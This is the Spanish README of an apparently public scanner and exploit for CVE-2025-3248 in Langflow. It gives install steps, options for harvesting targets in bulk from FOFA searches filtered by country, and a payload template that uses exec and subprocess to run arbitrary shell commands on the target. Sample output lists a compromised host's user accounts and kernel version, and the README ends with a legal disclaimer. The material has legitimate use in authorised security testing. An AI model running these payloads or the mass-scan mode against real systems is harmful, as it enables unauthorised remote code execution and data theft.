
Un escáner de vulnerabilidades para CVE-2025-3248 en aplicaciones Langflow.
中文 | English
Un escáner de vulnerabilidades para CVE-2025-3248 en aplicaciones Langflow.
git clone https://github.com/xuemian168/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
source venv/bin/active
pip install -r requirements.txt
# Después de terminar de editar
mv .env.example .env
python main.py -t https://target.com
python main.py --fofa-email [email protected] --fofa-key your_api_key
-t, --target: URL objetivo a escanear--fofa-email: Correo electrónico de la API de FOFA--fofa-key: Clave de la API de FOFA--fofa-query: Consulta de búsqueda FOFA (por defecto: 'app="LOGSPACE-LangFlow"')--country: Filtrar resultados por código de país (p. ej., CN, US)--max-pages: Número máximo de páginas FOFA a recuperar (por defecto: 5)--page-size: Resultados por página (por defecto: 100)--timeout: Tiempo de espera de solicitud en segundos (por defecto: 10)--no-verify: Deshabilitar verificación SSL--threads: Número de hilos para escaneo concurrente (por defecto: 5)-f, --file: Archivo Python personalizado para usar como payloadPuedes crear payloads personalizados creando un archivo Python:
def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')):
pass
Luego úsalo con:
python main.py -t https://target.com -f your_payload.py
[+] User Accounts:
root UID:0 GID:0 Home:/root Shell:/bin/bash
daemon UID:1 GID:1 Home:/usr/sbin Shell:/usr/sbin/nologin
bin UID:2 GID:2 Home:/bin Shell:/usr/sbin/nologin
sys UID:3 GID:3 Home:/dev Shell:/usr/sbin/nologin
sync UID:4 GID:65534 Home:/bin Shell:/bin/sync
games UID:5 GID:60 Home:/usr/games Shell:/usr/sbin/nologin
man UID:6 GID:12 Home:/var/cache/man Shell:/usr/sbin/nologin
lp UID:7 GID:7 Home:/var/spool/lpd Shell:/usr/sbin/nologin
mail UID:8 GID:8 Home:/var/mail Shell:/usr/sbin/nologin
news UID:9 GID:9 Home:/var/spool/news Shell:/usr/sbin/nologin
uucp UID:10 GID:10 Home:/var/spool/uucp Shell:/usr/sbin/nologin
proxy UID:13 GID:13 Home:/bin Shell:/usr/sbin/nologin
www-data UID:33 GID:33 Home:/var/www Shell:/usr/sbin/nologin
backup UID:34 GID:34 Home:/var/backups Shell:/usr/sbin/nologin
list UID:38 GID:38 Home:/var/list Shell:/usr/sbin/nologin
irc UID:39 GID:39 Home:/run/ircd Shell:/usr/sbin/nologin
_apt UID:42 GID:65534 Home:/nonexistent Shell:/usr/sbin/nologin
nobody UID:65534 GID:65534 Home:/nonexistent Shell:/usr/sbin/nologin
user UID:1000 GID:0 Home:/app/data Shell:/bin/sh
[+] System Details:
Linux ********** 6.8.0-1020-aws #22-Ubuntu SMP Thu Nov 21 **:**:** UTC 2025 x86_64 GNU/Linux
⚠️ Descargo de responsabilidad Esta herramienta es solo para fines legales. Está diseñada para fines educativos, pruebas de seguridad internas de la empresa o uso en entornos autorizados. Está estrictamente prohibido usar esta herramienta en cualquier sistema, red o dispositivo no autorizado; de lo contrario, puede violar las leyes y regulaciones aplicables.
Los usuarios asumirán todas las responsabilidades legales por sus acciones. El autor y los colaboradores no son responsables de ninguna pérdida, filtración de datos o consecuencias legales derivadas del uso inadecuado de esta herramienta.
⚠️ No usar para ataques ilegales. No intentar implementar o ejecutar esta herramienta en sistemas no autorizados.